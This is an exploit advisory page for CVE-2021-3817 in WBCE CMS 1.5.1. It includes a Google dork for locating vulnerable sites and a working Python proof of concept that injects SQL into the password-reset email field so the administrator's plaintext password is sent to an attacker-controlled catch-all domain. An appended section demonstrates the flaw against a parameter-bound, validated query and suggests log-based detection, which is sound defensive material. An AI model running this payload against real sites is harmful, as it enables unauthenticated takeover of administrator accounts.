WBCE CMS 1.5.1 Admin Password Reset

2021.12.20
Credit: citril
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75

import requests

_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature

headers = {
    'User-Agent': 'Mozilla/5.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
}

_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"

r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
    print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
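Why the `email` value in the PoC above selects the `user_id=1` row when it is concatenated into a query, and why validating and binding the value stops it. This is an added example, not part of the original advisory and not WBCE's code. The `users` table, the query text, the helper names and the `.example` addresses are assumptions made for illustration, run against an in-memory SQLite database.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed request bodies: the first has the PoC's shape with a placeholder domain.
POC_BODY = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40attacker.example&submit=x"
BENIGN_BODY = "email=editor%40site.example&submit=x"

# Conservative allow-list for the address format accepted by the reset form.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def make_db():
    # Hypothetical minimal users table, not WBCE's real schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [(1, "admin@site.example"), (2, "editor@site.example")])
    return db


def email_field(body):
    # Decode the form body the way the server would before using the value.
    return parse_qs(body, keep_blank_values=True).get("email", [""])[0]


def lookup_concatenated(db, email):
    # Vulnerable pattern (CWE-89): the request value becomes part of the SQL text,
    # so the quote closes the literal and "or user_id=1" joins the WHERE clause.
    sql = "SELECT user_id FROM users WHERE email = '" + email + "'"
    return [row[0] for row in db.execute(sql)]


def lookup_bound(db, email):
    # Hardened pattern: reject anything that is not an address, then bind the
    # value as a parameter so it is only ever compared as data.
    if not EMAIL_RE.fullmatch(email):
        return []
    sql = "SELECT user_id FROM users WHERE email = ?"
    return [row[0] for row in db.execute(sql, (email,))]


if __name__ == "__main__":
    db = make_db()
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        value = email_field(body)
        print(label, repr(value), "concatenated:", lookup_concatenated(db, value),
              "bound:", lookup_bound(db, value))
```

The same allow-list check applied to the `email` parameter of logged requests to the password-reset endpoint is a cheap detection signal, since a legitimate reset never submits quotes or SQL comment markers there.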



Copyright 2024, cxsecurity.com